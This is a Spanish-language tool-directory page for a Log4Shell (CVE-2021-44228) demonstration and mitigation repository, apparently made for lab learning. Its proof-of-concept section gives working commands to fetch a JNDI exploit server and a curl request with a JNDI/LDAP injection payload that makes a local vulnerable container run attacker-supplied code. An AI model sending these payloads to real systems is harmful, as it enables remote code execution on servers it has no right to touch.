Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4Shell — Este repositorio es para la demostración y mitigación de la vulnerabilidad Log4j 2021 (CVE-2021-44228). | Kitploit
Herramientas/GitHubGitHub/feryaeljustice/log4shell
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubferyaeljustice/log4shell

Log4Shell

Este repositorio es para la demostración y mitigación de la vulnerabilidad Log4j 2021 (CVE-2021-44228).

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4Shell

Este repositorio es para la demostración y mitigación de la vulnerabilidad Log4j 2021 (CVE-2021-44228).

¿Qué es Log4Shell?

La vulnerabilidad CVE-2021-44228 / Log4Shell consiste en inyectar en software vulnerable una carga maliciosa, que pedirá a Log4J obtener un valor de una fuente de terceros, con JNDI y a través del protocolo LDAP. ... Los datos importados pueden ser código, que será ejecutado por Log4J en el sistema.

Prueba de concepto (TUTORIAL EN VIDEO)

  1. Ejecutamos una aplicación web Spring Boot vulnerable a CVE-2021-44228 en Docker, apodada Log4Shell por @christophetd. Usa Log4j 2.14.1 (a través de spring-boot-starter-log4j2 2.6.1) y el JDK 1.8.0_181. docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app Log4Shell_1 Log4Shell_2

  • Descargamos el JNDI Exploit para Log4Shell desde el archivo web en este caso, pero puedes descargarlo desde donde esté disponible. wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip Log4Shell_3 Log4Shell_4

  • Obtenemos la dirección IP de nuestra máquina que está ejecutando el docker de la aplicación Log4Shell. ifconfig Log4Shell_IP

  • Descomprimimos el zip con el JNDI Exploit para Log4Shell, así obtenemos el JAR y lo ejecutamos poniendo nuestra IP obtenida en el paso 3.

  • root@kitploit:~
    unzip JNDIExploit.v1.2.zip
    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
    

    Log4Shell_5

    1. Luego, activamos el exploit usando: curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' Log4Shell_6
    • Vemos que tenemos una conexión JNDI a nuestra máquina, y podemos ver el código ejecutado por Log4J. Log4Shell_7
    1. Para confirmar que la ejecución del código fue exitosa, observa que el archivo /tmp/pwned.txt fue creado en el contenedor que ejecuta la aplicación vulnerable. docker exec vulnerable-app ls /tmp Log4Shell_8

    Mitigación

    Video de cómo mitigar la vulnerabilidad Log4Shell en Windows y Linux: MITIGACIÓN

    Mitigación en Linux (imagen de ejemplo)

    MITIGACIÓN

    Autor

    Feryael Justice 2022

    Descargar herramienta